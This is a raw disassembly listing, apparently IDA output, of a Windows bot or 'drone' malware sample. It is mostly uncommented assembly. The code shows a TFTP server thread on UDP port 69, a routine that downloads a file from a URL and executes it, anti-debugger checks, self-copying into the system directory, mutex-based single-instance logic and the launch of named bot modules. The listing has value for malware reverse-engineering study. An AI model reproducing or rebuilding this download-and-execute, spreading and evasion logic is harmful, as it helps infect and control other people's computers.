push [ebp+var_228]
call sub_4034C4
pop ecx
mov ecx, [ebp+var_8]
pop edi
pop esi
xor ecx, ebp
xor eax, eax
pop ebx
call sub_402710
leave
retn 4
; ---------------------------------------------------------------------------
loc_41B5BA: ; CODE XREF: sub_41B3D0+100�j
; sub_41B3D0+125�j ...
push edi
call ds:dword_41D224 ; closesocket
push [ebp+var_228]
call sub_4034C4
pop ecx
jmp loc_41B3EF
sub_41B3D0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B5D2 proc near ; DATA XREF: sub_41B775+53�o
var_148 = dword ptr -148h
var_144 = dword ptr -144h
var_140 = dword ptr -140h
var_13C = dword ptr -13Ch
var_138 = byte ptr -138h
var_134 = dword ptr -134h
var_120 = dword ptr -120h
var_11C = dword ptr -11Ch
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = dword ptr -4
push ebp
mov ebp, esp
and esp, 0FFFFFFF8h
sub esp, 14Ch
mov eax, dword_423064
xor eax, esp
mov [esp+14Ch+var_4], eax
push ebx
push esi
push edi
push 11h
xor esi, esi
push 2
inc esi
push 2
mov [esp+164h+var_140], esi
call ds:dword_41D27C ; socket
cmp eax, 0FFFFFFFFh
mov dword_4269E4, eax
jnz short loc_41B61B
xor ebx, ebx
loc_41B60E: ; CODE XREF: sub_41B5D2+C1�j
mov byte_433945, bl
loc_41B614: ; CODE XREF: sub_41B5D2+BF�j
push ebx
call ds:dword_41D08C ; ExitThread
loc_41B61B: ; CODE XREF: sub_41B5D2+38�j
push 4
lea ecx, [esp+15Ch+var_140]
push ecx
push 4
push 0FFFFh
push eax
call ds:dword_41D250 ; setsockopt
xor eax, eax
lea edi, [esp+158h+var_14]
stosd
stosd
stosd
stosd
push 45h
mov [esp+15Ch+var_14], 2
call ds:dword_41D278 ; htons
mov [esp+158h+var_12], ax
push 10h
lea eax, [esp+15Ch+var_14]
push eax
push dword_4269E4
xor ebx, ebx
mov [esp+164h+var_10], ebx
call ds:dword_41D26C ; bind
cmp eax, 0FFFFFFFFh
jnz loc_41B744
push dword_4269E4
call ds:dword_41D224 ; closesocket
cmp byte_433945, bl
jz short loc_41B614
jmp loc_41B60E
; ---------------------------------------------------------------------------
loc_41B698: ; CODE XREF: sub_41B5D2+178�j
mov eax, dword_4269E4
mov [esp+158h+var_11C], eax
xor eax, eax
lea edi, [esp+158h+var_148]
stosd
stosd
lea eax, [esp+158h+var_148]
push eax
push ebx
push ebx
lea eax, [esp+164h+var_120]
push eax
push ebx
mov [esp+16Ch+var_120], esi
mov [esp+16Ch+var_148], 5
mov [esp+16Ch+var_144], ebx
call ds:dword_41D258 ; select
test eax, eax
jle short loc_41B744
xor eax, eax
lea edi, [esp+158h+var_134]
stosd
stosd
stosd
stosd
stosd
lea eax, [esp+158h+var_13C]
push eax
lea eax, [esp+15Ch+var_14]
push eax
push ebx
push 14h
lea eax, [esp+168h+var_134]
push eax
push dword_4269E4
mov [esp+170h+var_13C], 10h
call ds:dword_41D25C ; recvfrom
cmp eax, 0FFFFFFFFh
jz short loc_41B744
push [esp+158h+var_134]
inc dword_433948
call ds:dword_41D254 ; htons
cmp ax, si
jnz short loc_41B744
lea eax, [esp+158h+var_138]
push eax
push ebx
lea eax, [esp+160h+var_14]
push eax
push offset sub_41B3D0
push ebx
push ebx
call ds:dword_41D110 ; CreateThread
push 3E8h
call ds:dword_41D0FC ; Sleep
loc_41B744: ; CODE XREF: sub_41B5D2+A7�j
; sub_41B5D2+FC�j ...
cmp byte_433945, bl
jnz loc_41B698
push dword_4269E4
call ds:dword_41D224 ; closesocket
mov ecx, [esp+158h+var_4]
pop edi
pop esi
pop ebx
xor ecx, esp
xor eax, eax
call sub_402710
mov esp, ebp
pop ebp
retn 4
sub_41B5D2 endp
; =============== S U B R O U T I N E =======================================
sub_41B775 proc near ; CODE XREF: sub_401F1C+5A�p
; .text:0041BFB5�p
push 4
mov eax, offset loc_41C274
call sub_4045CC
xor ebx, ebx
cmp byte_433945, bl
jz short loc_41B78F
loc_41B78B: ; CODE XREF: sub_41B775+74�j
mov al, 1
jmp short loc_41B7F3
; ---------------------------------------------------------------------------
loc_41B78F: ; CODE XREF: sub_41B775+14�j
mov edi, 100h
push edi
push ebx
mov esi, offset dword_4269E8
push esi
call sub_407B70
add esp, 0Ch
push edi
push esi
push ebx
call ds:dword_41D0E4 ; GetModuleHandleA
push eax
call ds:dword_41D060 ; GetModuleFileNameA
push 8
call sub_40304B
mov esi, eax
pop ecx
mov [ebp-10h], esi
cmp esi, ebx
mov [ebp-4], ebx
jz short loc_41B7DB
push offset sub_41B5D2
xor ecx, ecx
mov edi, offset aTftpServer ; "TFTP Server"
call sub_4140AB
jmp short loc_41B7DD
; ---------------------------------------------------------------------------
loc_41B7DB: ; CODE XREF: sub_41B775+51�j
xor eax, eax
loc_41B7DD: ; CODE XREF: sub_41B775+64�j
cmp [eax+4], ebx
jz short loc_41B7EB
mov byte_433945, 1
jmp short loc_41B78B
; ---------------------------------------------------------------------------
loc_41B7EB: ; CODE XREF: sub_41B775+6B�j
mov byte_433945, bl
xor al, al
loc_41B7F3: ; CODE XREF: sub_41B775+18�j
call sub_40466B
retn
sub_41B775 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B7F9 proc near ; CODE XREF: sub_40177B+6C�p
; sub_4019F3+6C�p ...
var_3DC = dword ptr -3DCh
var_3D8 = byte ptr -3D8h
var_308 = byte ptr -308h
var_307 = byte ptr -307h
var_208 = byte ptr -208h
var_207 = byte ptr -207h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
and esp, 0FFFFFFF8h
sub esp, 3E0h
mov eax, dword_423064
xor eax, esp
mov [esp+3E0h+var_4], eax
mov eax, [ebp+arg_0]
push ebx
push esi
mov esi, 1FFh
xor ebx, ebx
push esi
mov [esp+3ECh+var_3DC], eax
lea eax, [esp+3ECh+var_207]
push ebx
push eax
mov [esp+3F4h+var_208], bl
call sub_407B70
add esp, 0Ch
push 0FFh
lea eax, [esp+3ECh+var_307]
push ebx
push eax
mov [esp+3F4h+var_308], bl
call sub_407B70
add esp, 0Ch
lea eax, [esp+3E8h+var_3D8]
call sub_4143A0
push [esp+3E8h+var_3DC]
lea eax, [esp+3ECh+var_208]
push offset aS_19 ; "%s"
push esi
push eax
call sub_402AEE
lea eax, [esp+3F8h+var_208]
add esp, 10h
lea esi, [eax+1]
loc_41B886: ; CODE XREF: sub_41B7F9+92�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_41B886
lea ecx, [esp+3E8h+var_3D8]
push ecx
sub eax, esi
push eax
lea ecx, [esp+3F0h+var_208]
call sub_416C60
push 200h
lea eax, [esp+3F4h+var_208]
push ebx
push eax
call sub_407B70
lea eax, [esp+3FCh+var_308]
add esp, 14h
push eax
lea ebx, [esp+3ECh+var_3D8]
call sub_416AE0
pop ecx
push 0C0h
push 0
push edi
call sub_407B70
add esp, 0Ch
xor esi, esi
loc_41B8DB: ; CODE XREF: sub_41B7F9+114�j
movzx eax, [esp+esi+3E8h+var_308]
push eax
push edi
push offset aSX ; "%s%X"
push 0BFh
push edi
call sub_402AEE
mov eax, edi
add esp, 14h
lea ecx, [eax+1]
loc_41B8FD: ; CODE XREF: sub_41B7F9+109�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_41B8FD
sub eax, ecx
inc esi
cmp esi, 40h
mov [eax+edi], dl
jl short loc_41B8DB
mov ecx, [esp+3E8h+var_4]
pop esi
pop ebx
xor ecx, esp
mov eax, edi
call sub_402710
mov esp, ebp
pop ebp
retn
sub_41B7F9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B925 proc near ; DATA XREF: sub_40177B+234�o
; sub_4019F3+1E6�o
var_750 = dword ptr -750h
var_74C = dword ptr -74Ch
var_748 = dword ptr -748h
var_744 = dword ptr -744h
var_740 = dword ptr -740h
var_73C = byte ptr -73Ch
var_738 = byte ptr -738h
var_638 = byte ptr -638h
var_615 = byte ptr -615h
var_515 = byte ptr -515h
var_415 = byte ptr -415h
var_414 = byte ptr -414h
var_413 = dword ptr -413h
var_408 = byte ptr -408h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
and esp, 0FFFFFFF8h
sub esp, 754h
mov eax, dword_423064
xor eax, esp
mov [esp+754h+var_4], eax
push ebx
push esi
mov esi, [ebp+arg_0]
push edi
mov ecx, 0C9h
lea edi, [esp+760h+var_738]
rep movsd
xor ebx, ebx
push ebx
push ebx
push ebx
movsw
push ebx
push offset aMozilla5_0 ; "Mozilla/5.0"
movsb
call ds:dword_41D21C ; InternetOpenA
mov esi, eax
lea eax, [esp+760h+var_515]
push eax
lea eax, [esp+764h+var_615]
push eax
push offset aDlDownloadingS ; "DL: Downloading %s to %s"
lea eax, [esp+76Ch+var_738]
push eax
push [esp+770h+var_413]
mov edi, offset dword_4269BC
push edi
call sub_417361
add esp, 18h
push ebx
push ebx
push ebx
push ebx
lea eax, [esp+770h+var_615]
push eax
push esi
call ds:dword_41D218 ; InternetOpenUrlA
cmp esi, ebx
mov [esp+760h+var_744], eax
jz loc_41BB44
cmp eax, ebx
jz loc_41BB3D
push ebx
push ebx
push 2
push ebx
push ebx
push 40000000h
lea eax, [esp+778h+var_515]
push eax
call ds:dword_41D06C ; CreateFileA
mov [esp+760h+var_748], eax
call ds:dword_41D108 ; GetTickCount
mov [esp+760h+var_740], eax
mov [esp+760h+var_750], ebx
mov esi, 400h
loc_41B9EC: ; CODE XREF: sub_41B925+11F�j
push esi
lea eax, [esp+764h+var_408]
push ebx
push eax
call sub_407B70
add esp, 0Ch
lea eax, [esp+760h+var_74C]
push eax
push esi
lea eax, [esp+768h+var_408]
push eax
push [esp+76Ch+var_744]
call ds:dword_41D214 ; InternetReadFile
push ebx
lea eax, [esp+764h+var_73C]
push eax
push [esp+768h+var_74C]
lea eax, [esp+76Ch+var_408]
push eax
push [esp+770h+var_748]
call ds:dword_41D088 ; WriteFile
test eax, eax
jz loc_41BAEF
mov eax, [esp+760h+var_74C]
add [esp+760h+var_750], eax
cmp eax, ebx
ja short loc_41B9EC
call ds:dword_41D108 ; GetTickCount
sub eax, [esp+760h+var_740]
xor edx, edx
mov ecx, 3E8h
div ecx
mov ecx, eax
cmp ecx, ebx
jnz short loc_41BA62
xor ecx, ecx
inc ecx
loc_41BA62: ; CODE XREF: sub_41B925+138�j
mov eax, [esp+760h+var_750]
xor edx, edx
div ecx
shr eax, 0Ah
push eax
push ecx
push [esp+768h+var_750]
lea eax, [esp+76Ch+var_515]
push eax
push offset aDlDownloadSIBy ; "DL: Download %s (%i Bytes) finished in "...
lea eax, [esp+774h+var_738]
push eax
push [esp+778h+var_413]
push edi
call sub_417361
add esp, 20h
push [esp+760h+var_748]
call ds:dword_41D0DC ; CloseHandle
cmp [esp+760h+var_415], 1
jnz loc_41BB5E
cmp [esp+760h+var_414], bl
lea eax, [esp+760h+var_515]
jz short loc_41BAFD
push eax
call sub_419219
test al, al
pop ecx
lea eax, [esp+760h+var_738]
jz short loc_41BAF6
push offset aMainUninstalli ; "Main: Uninstalling Drone"
push eax
push [esp+768h+var_413]
push edi
call sub_417361
add esp, 10h
lea eax, [esp+760h+var_638]
push eax
call sub_419477 ; IsDebuggerPresent
loc_41BAEF: ; CODE XREF: sub_41B925+10F�j
push offset aDlFailedBadLoc ; "DL: Failed; Bad Location."
jmp short loc_41BB49
; ---------------------------------------------------------------------------
loc_41BAF6: ; CODE XREF: sub_41B925+1A5�j
push offset aDlFailedToUpda ; "DL: Failed To Update"
jmp short loc_41BB4D
; ---------------------------------------------------------------------------
loc_41BAFD: ; CODE XREF: sub_41B925+196�j
push 5
push ebx
push ebx
push eax
push offset byte_41EF0F
push ebx
call ds:dword_41D1E4
test eax, eax
jnz short loc_41BB19
push offset aDlErrorExecuti ; "DL: Error Executing File."
jmp short loc_41BB49
; ---------------------------------------------------------------------------
loc_41BB19: ; CODE XREF: sub_41B925+1EB�j
lea eax, [esp+760h+var_515]
push eax
push offset aDlExecutedFile ; "DL: Executed File: %s"
lea eax, [esp+768h+var_738]
push eax
push [esp+76Ch+var_413]
push edi
call sub_417361
add esp, 14h
jmp short loc_41BB5E
; ---------------------------------------------------------------------------
loc_41BB3D: ; CODE XREF: sub_41B925+91�j
push offset aDlFailedBadUrl ; "DL: Failed; Bad URL"
jmp short loc_41BB49
; ---------------------------------------------------------------------------
loc_41BB44: ; CODE XREF: sub_41B925+89�j
push offset aDlFailedWinine ; "DL: Failed; WinINET Error"
loc_41BB49: ; CODE XREF: sub_41B925+1CF�j
; sub_41B925+1F2�j ...
lea eax, [esp+764h+var_738]
loc_41BB4D: ; CODE XREF: sub_41B925+1D6�j
push eax
push [esp+768h+var_413]
push edi
call sub_417361
add esp, 10h
loc_41BB5E: ; CODE XREF: sub_41B925+182�j
; sub_41B925+216�j
call ds:dword_41D0E0 ; GetCurrentThreadId
push eax
call sub_414042
pop ecx
mov ecx, [esp+760h+var_4]
pop edi
pop esi
pop ebx
xor ecx, esp
xor eax, eax
call sub_402710
mov esp, ebp
pop ebp
retn 4
sub_41B925 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BB84 proc near ; CODE XREF: sub_41C370+45�p
; sub_41C370+61�p ...
var_108 = dword ptr -108h
var_104 = byte ptr -104h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 108h
mov eax, dword_423064
xor eax, ebp
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_104]
push 100h
push eax
mov dword ptr [esi], offset off_420A74
mov [ebp+var_108], esi
call sub_402AEE
mov eax, dword_433C40
add esp, 0Ch
lea edx, [ebp+var_108]
push edx
mov ecx, offset dword_433C3C
push eax
push ecx
call sub_40121E
mov ecx, [ebp+var_4]
xor ecx, ebp
mov eax, esi
call sub_402710
leave
retn 4
sub_41BB84 endp
; ---------------------------------------------------------------------------
loc_41BBE3: ; CODE XREF: .text:004040AA�p
push ebp
mov ebp, esp
and esp, 0FFFFFFF8h
sub esp, 724h
mov eax, dword_423064
xor eax, esp
mov [esp+720h], eax
mov eax, [ebp+10h]
push ebx
push esi
push edi
mov [esp+10h], eax
call sub_419677
test al, al
jz short loc_41BC29
loc_41BC10: ; CODE XREF: .text:0041BDA1�j
; .text:0041BDCC�j ...
mov ecx, [esp+72Ch]
pop edi
pop esi
pop ebx
xor ecx, esp
xor eax, eax
call sub_402710
mov esp, ebp
pop ebp
retn 10h
; ---------------------------------------------------------------------------
loc_41BC29: ; CODE XREF: .text:0041BC0E�j
call sub_4195EC
test al, al
jnz loc_41C061
call ds:dword_41D090 ; IsDebuggerPresent
test eax, eax
jnz loc_41C061
mov esi, offset aIrn ; "--irn "
lea edi, [esp+248h]
movsd
movsw
movsb
mov edi, 103h
xor ebx, ebx
push edi
lea eax, [esp+625h]
push ebx
push eax
mov [esp+62Ch], bl
call sub_407B70
add esp, 0Ch
push edi
lea eax, [esp+415h]
push ebx
push eax
mov [esp+41Ch], bl
call sub_407B70
add esp, 0Ch
push edi
lea eax, [esp+30Dh]
push ebx
push eax
mov [esp+314h], bl
call sub_407B70
add esp, 0Ch
push 7Fh
lea eax, [esp+28Dh]
push ebx
push eax
mov [esp+294h], bl
call sub_407B70
add esp, 0Ch
push edi
lea eax, [esp+624h]
push eax
call ds:dword_41D0F4 ; GetSystemDirectoryA
push 80h
lea esi, [esp+28Ch]
mov ebx, offset byte_425061
call sub_4196D1
pop ecx
mov eax, esi
push eax
lea eax, [esp+624h]
push eax
push offset aSS_10 ; "%s\\%s"
lea eax, [esp+314h]
push edi
push eax
call sub_402AEE
lea eax, [esp+31Ch]
add esp, 14h
lea ecx, [eax+1]
loc_41BD11: ; CODE XREF: .text:0041BD16�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_41BD11
sub eax, ecx
xor ebx, ebx
mov [esp+eax+308h], bl
mov esi, 104h
push esi
lea eax, [esp+414h]
push eax
push ebx
call ds:dword_41D0E4 ; GetModuleHandleA
push eax
call ds:dword_41D060 ; GetModuleFileNameA
lea eax, [esp+248h]
lea ecx, [eax+1]
loc_41BD49: ; CODE XREF: .text:0041BD4E�j
mov dl, [eax]
inc eax
cmp dl, bl
jnz short loc_41BD49
sub eax, ecx
push eax
lea eax, [esp+24Ch]
push eax
push dword ptr [esp+18h]
call sub_4029E9
add esp, 0Ch
test eax, eax
jz short loc_41BDD1
push esi
lea eax, [esp+30Ch]
push eax
lea eax, [esp+418h]
push eax
call sub_4029E9
add esp, 0Ch
test eax, eax
jz short loc_41BDD1
push ebx
lea eax, [esp+30Ch]
push eax
lea eax, [esp+418h]
push eax
call ds:dword_41D080 ; CopyFileA
test eax, eax
jz loc_41BC10
lea eax, [esp+410h]
push eax
lea eax, [esp+24Ch]
push eax
lea eax, [esp+310h]
push eax
push offset aSSS_2 ; "%s %s%s"
call sub_419219
add esp, 10h
jmp loc_41BC10
; ---------------------------------------------------------------------------
loc_41BDD1: ; CODE XREF: .text:0041BD69�j
; .text:0041BD86�j
lea eax, [esp+248h]
lea edx, [eax+1]
loc_41BDDB: ; CODE XREF: .text:0041BDE0�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_41BDDB
sub eax, edx
push eax
lea eax, [esp+24Ch]
push eax
push dword ptr [esp+18h]
call sub_4029E9
add esp, 0Ch
test eax, eax
jnz loc_41BE8C
push esi
lea eax, [esp+30Ch]
push eax
lea eax, [esp+418h]
push eax
call sub_4029E9
add esp, 0Ch
test eax, eax
jnz short loc_41BE8C
push edi
lea eax, [esp+51Dh]
push ebx
push eax
mov [esp+524h], bl
call sub_407B70
lea eax, [esp+254h]
add esp, 0Ch
lea edi, [eax+1]
loc_41BE41: ; CODE XREF: .text:0041BE46�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_41BE41
mov ecx, [esp+10h]
sub eax, edi
add eax, ecx
push eax
push offset aS_15 ; "%s"
lea eax, [esp+520h]
push esi
push eax
call sub_402AEE
add esp, 10h
xor esi, esi
loc_41BE69: ; CODE XREF: .text:0041BE8A�j
lea eax, [esp+518h]
push eax
call ds:dword_41D0D0 ; DeleteFileA
test eax, eax
jnz short loc_41BE8C
push 0C8h
call ds:dword_41D0FC ; Sleep
inc esi
cmp esi, 3
jb short loc_41BE69
loc_41BE8C: ; CODE XREF: .text:0041BDFB�j
; .text:0041BE1C�j ...
push 80h
lea eax, [esp+28Ch]
push ebx
push eax
call sub_407B70
add esp, 0Ch
push 37h
lea eax, [esp+255h]
push ebx
push eax
mov [esp+25Ch], bl
call sub_407B70
add esp, 0Ch
push 38h
lea esi, [esp+254h]
mov ebx, offset byte_4250E1
call sub_4196D1
pop ecx
mov eax, esi
push eax
push 1
xor ebx, ebx
push ebx
call ds:dword_41D084 ; CreateMutexA
push 38h
mov esi, eax
lea eax, [esp+254h]
push ebx
push eax
call sub_407B70
add esp, 0Ch
push 1388h
push esi
call ds:dword_41D07C ; WaitForSingleObject
cmp eax, 102h
jnz short loc_41BF0D
push ebx
call ds:dword_41D050 ; ExitProcess
loc_41BF0D: ; CODE XREF: .text:0041BF04�j
call sub_416F86
push 8
call sub_40304B
cmp eax, ebx
pop ecx
jz short loc_41BF31
push offset sub_417119
xor ecx, ecx
mov edi, offset aRm ; "RM"
mov esi, eax
call sub_4140AB
loc_41BF31: ; CODE XREF: .text:0041BF1C�j
lea eax, [esp+20h]
push eax
mov dword ptr [esp+24h], 94h
call ds:dword_41D068 ; GetVersionExA
cmp dword ptr [esp+24h], 4
jz short loc_41BF6A
push 8
call sub_40304B
cmp eax, ebx
pop ecx
jz short loc_41BF6A
push offset sub_419EA0
xor ecx, ecx
mov edi, offset aBk ; "BK"
mov esi, eax
call sub_4140AB
loc_41BF6A: ; CODE XREF: .text:0041BF49�j
; .text:0041BF55�j
push 8
mov byte_4269C0, bl
call sub_40304B
cmp eax, ebx
pop ecx
jz short loc_41BF8F
push offset sub_418301
xor ecx, ecx
mov edi, offset aUnm ; "UNM"
mov esi, eax
call sub_4140AB
loc_41BF8F: ; CODE XREF: .text:0041BF7A�j
lea eax, [esp+0B8h]
push eax
push 202h
call ds:dword_41D274 ; WSAStartup
test eax, eax
jnz loc_41C056
call sub_4192FB
mov byte_433945, bl
call sub_41B775
mov eax, [ebp+8]
mov byte_4268B4, bl
mov dword_4266A4, eax
call sub_418D17
mov eax, dword_433C40
mov eax, [eax]
mov ebx, offset dword_433C3C
mov [esp+14h], eax
mov [esp+10h], ebx
loc_41BFE1: ; CODE XREF: .text:0041C00C�j
cmp dword ptr [esp+10h], 0
mov esi, dword_433C40
jz short loc_41BFF4
cmp [esp+10h], ebx
jz short loc_41BFF9
loc_41BFF4: ; CODE XREF: .text:0041BFEC�j
call sub_402F5D
loc_41BFF9: ; CODE XREF: .text:0041BFF2�j
cmp [esp+14h], esi
jz short loc_41C00E
lea edi, [esp+18h]
lea esi, [esp+10h]
call sub_40168C
jmp short loc_41BFE1
; ---------------------------------------------------------------------------
loc_41C00E: ; CODE XREF: .text:0041BFFD�j
mov esi, offset dword_4269BC
loc_41C013: ; CODE XREF: .text:0041C054�j
movsx eax, word_424E48
push eax
push offset dword_424C48
mov edx, offset dword_424A48
mov ecx, esi
call sub_41802F
test al, al
jz short loc_41C042
mov byte_4269C0, 1
loc_41C037: ; CODE XREF: .text:0041C040�j
mov ecx, esi
call sub_417F01
test al, al
jnz short loc_41C037
loc_41C042: ; CODE XREF: .text:0041C02E�j
push 3A98h
mov byte_4269C0, 0
call ds:dword_41D0FC ; Sleep
jmp short loc_41C013
; ---------------------------------------------------------------------------
loc_41C056: ; CODE XREF: .text:0041BFA4�j
call ds:dword_41D244 ; WSACleanup
jmp loc_41BC10
; ---------------------------------------------------------------------------
loc_41C061: ; CODE XREF: .text:0041BC30�j
; .text:0041BC3E�j
push offset byte_41EF17
call sub_419477 ; IsDebuggerPresent
; ---------------------------------------------------------------------------
db 5 dup(0CCh)
; =============== S U B R O U T I N E =======================================
sub_41C070 proc near ; CODE XREF: sub_418DA0+2F�p
; sub_418DA0+6C�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push edi
push esi
push ebx
xor edi, edi
mov eax, [esp+0Ch+arg_4]
or eax, eax
jge short loc_41C091
inc edi
mov edx, [esp+0Ch+arg_0]
neg eax
neg edx
sbb eax, 0
mov [esp+0Ch+arg_4], eax
mov [esp+0Ch+arg_0], edx
loc_41C091: ; CODE XREF: sub_41C070+B�j
mov eax, [esp+0Ch+arg_C]
or eax, eax
jge short loc_41C0AD
inc edi
mov edx, [esp+0Ch+arg_8]
neg eax
neg edx
sbb eax, 0
mov [esp+0Ch+arg_C], eax
mov [esp+0Ch+arg_8], edx
loc_41C0AD: ; CODE XREF: sub_41C070+27�j
or eax, eax
jnz short loc_41C0C9
mov ecx, [esp+0Ch+arg_8]
mov eax, [esp+0Ch+arg_4]
xor edx, edx
div ecx
mov ebx, eax
mov eax, [esp+0Ch+arg_0]
div ecx
mov edx, ebx
jmp short loc_41C10A
; ---------------------------------------------------------------------------
loc_41C0C9: ; CODE XREF: sub_41C070+3F�j
mov ebx, eax
mov ecx, [esp+0Ch+arg_8]
mov edx, [esp+0Ch+arg_4]
mov eax, [esp+0Ch+arg_0]
loc_41C0D7: ; CODE XREF: sub_41C070+71�j
shr ebx, 1
rcr ecx, 1
shr edx, 1
rcr eax, 1
or ebx, ebx
jnz short loc_41C0D7
div ecx
mov esi, eax
mul [esp+0Ch+arg_C]
mov ecx, eax
mov eax, [esp+0Ch+arg_8]
mul esi
add edx, ecx
jb short loc_41C105
cmp edx, [esp+0Ch+arg_4]
ja short loc_41C105
jb short loc_41C106
cmp eax, [esp+0Ch+arg_0]
jbe short loc_41C106
loc_41C105: ; CODE XREF: sub_41C070+85�j
; sub_41C070+8B�j
dec esi
loc_41C106: ; CODE XREF: sub_41C070+8D�j
; sub_41C070+93�j
xor edx, edx
mov eax, esi
loc_41C10A: ; CODE XREF: sub_41C070+57�j
dec edi
jnz short loc_41C114
neg edx
neg eax
sbb edx, 0
loc_41C114: ; CODE XREF: sub_41C070+9B�j
pop ebx
pop esi
pop edi
retn 10h
sub_41C070 endp
; ---------------------------------------------------------------------------
align 10h
cmp dword_433C7C, 0
jz short sub_41C156
loc_41C129: ; CODE XREF: .text:0041C154�j
push ebp
mov ebp, esp
sub esp, 8
and esp, 0FFFFFFF8h
fstp qword ptr [esp]
cvttsd2si eax, qword ptr [esp]
leave
retn
; ---------------------------------------------------------------------------
cmp dword_433C7C, 0
jz short sub_41C156
sub esp, 4
fnstcw word ptr [esp]
pop eax
and ax, 7Fh
cmp ax, 7Fh
jz short loc_41C129
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C156 proc near ; CODE XREF: sub_41A9DE+5AB�p
; .text:0041C127�j ...
var_20 = dword ptr -20h
var_10 = qword ptr -10h
var_8 = dword ptr -8
push ebp
mov ebp, esp
sub esp, 20h
and esp, 0FFFFFFF0h
fld st
fst [esp+20h+var_8]
fistp [esp+20h+var_10]
fild [esp+20h+var_10]
mov edx, [esp+20h+var_8]
mov eax, dword ptr [esp+20h+var_10]
test eax, eax
jz short loc_41C1B5
loc_41C179: ; CODE XREF: sub_41C156+69�j
fsubp st(1), st
test edx, edx
jns short loc_41C19D
fstp [esp+20h+var_20]
mov ecx, [esp+20h+var_20]
xor ecx, 80000000h
add ecx, 7FFFFFFFh
adc eax, 0
mov edx, dword ptr [esp+20h+var_10+4]
adc edx, 0
jmp short locret_41C1C9
; ---------------------------------------------------------------------------
loc_41C19D: ; CODE XREF: sub_41C156+27�j
fstp [esp+20h+var_20]
mov ecx, [esp+20h+var_20]
add ecx, 7FFFFFFFh
sbb eax, 0
mov edx, dword ptr [esp+20h+var_10+4]
sbb edx, 0
jmp short locret_41C1C9
; ---------------------------------------------------------------------------
loc_41C1B5: ; CODE XREF: sub_41C156+21�j
mov edx, dword ptr [esp+20h+var_10+4]
test edx, 7FFFFFFFh
jnz short loc_41C179
fstp [esp+20h+var_8]
fstp [esp+20h+var_8]
locret_41C1C9: ; CODE XREF: sub_41C156+45�j
; sub_41C156+5D�j
leave
retn
sub_41C156 endp
; ---------------------------------------------------------------------------
lea ecx, [ebp-28h]
jmp loc_401137
; ---------------------------------------------------------------------------
loc_41C1D3: ; DATA XREF: sub_40267A+2�o
; sub_4026B9+2�o
mov edx, [esp+8]
lea eax, [edx+0Ch]
mov ecx, [edx-54h]
xor ecx, eax
call sub_402710
mov eax, offset dword_4212B8
jmp sub_40428E
; ---------------------------------------------------------------------------
loc_41C1EE: ; DATA XREF: sub_40B4B4+2�o
mov edx, [esp+8]
lea eax, [edx+0Ch]
mov ecx, [edx-14h]
xor ecx, eax
call sub_402710
mov eax, offset dword_421658
jmp sub_40428E
; =============== S U B R O U T I N E =======================================
sub_41C209 proc near ; CODE XREF: sub_408062+14�p
; DATA XREF: sub_401442+2�o
arg_4 = dword ptr 8
mov edx, [esp+arg_4]
lea eax, [edx+0Ch]
mov ecx, [edx-1Ch]
xor ecx, eax
call sub_402710
mov eax, offset dword_421AB8
jmp sub_40428E
sub_41C209 endp
; ---------------------------------------------------------------------------
mov ecx, [ebp-10h]
jmp sub_402CCA
; ---------------------------------------------------------------------------
loc_41C22C: ; DATA XREF: sub_401065+2�o
; sub_4013E6+2�o
mov edx, [esp+8]
lea eax, [edx+0Ch]
mov ecx, [edx-14h]
xor ecx, eax
call sub_402710
mov eax, offset dword_421AE8
jmp sub_40428E
; ---------------------------------------------------------------------------
lea ecx, [ebp-2Ch]
jmp loc_401137
; ---------------------------------------------------------------------------
loc_41C24F: ; DATA XREF: sub_4016BA+2�o
mov edx, [esp+8]
lea eax, [edx+0Ch]
mov ecx, [edx-58h]
xor ecx, eax
call sub_402710
mov eax, offset dword_421B18
jmp sub_40428E
; ---------------------------------------------------------------------------
push dword ptr [ebp-10h]
call sub_402F6D
pop ecx
retn
; ---------------------------------------------------------------------------
loc_41C274: ; DATA XREF: sub_41B775+2�o
mov edx, [esp+8]
lea eax, [edx+0Ch]
mov ecx, [edx-14h]
xor ecx, eax
call sub_402710
mov eax, offset dword_421A00
jmp sub_40428E
; ---------------------------------------------------------------------------
push dword ptr [ebp-10h]
call sub_402F6D
pop ecx
retn
; ---------------------------------------------------------------------------
loc_41C299: ; DATA XREF: sub_418D17+2�o
mov edx, [esp+8]
lea eax, [edx+0Ch]
mov ecx, [edx-14h]
xor ecx, eax
call sub_402710
mov eax, offset dword_421A2C
jmp sub_40428E
; ---------------------------------------------------------------------------
lea ecx, [ebp-28h]
jmp loc_401137
; ---------------------------------------------------------------------------
loc_41C2BC: ; DATA XREF: sub_40121E+2�o
mov edx, [esp+8]
lea eax, [edx+0Ch]
mov ecx, [edx-54h]
xor ecx, eax
call sub_402710
mov eax, offset dword_421B48
jmp sub_40428E
; ---------------------------------------------------------------------------
push dword ptr [ebp-58h]
call sub_402F6D
pop ecx
retn
; ---------------------------------------------------------------------------
loc_41C2E1: ; DATA XREF: sub_401F1C+2�o
mov edx, [esp+8]
lea eax, [edx+0Ch]
mov ecx, [edx-70h]
xor ecx, eax
call sub_402710
mov ecx, [edx-4]
xor ecx, eax
call sub_402710
mov eax, offset dword_421B78
jmp sub_40428E
; ---------------------------------------------------------------------------
push dword ptr [ebp-4BCh]
call sub_402F6D
pop ecx
retn
; ---------------------------------------------------------------------------
loc_41C313: ; DATA XREF: sub_4019F3+5�o
mov edx, [esp+8]
lea eax, [edx+0Ch]
mov ecx, [edx-4C8h]
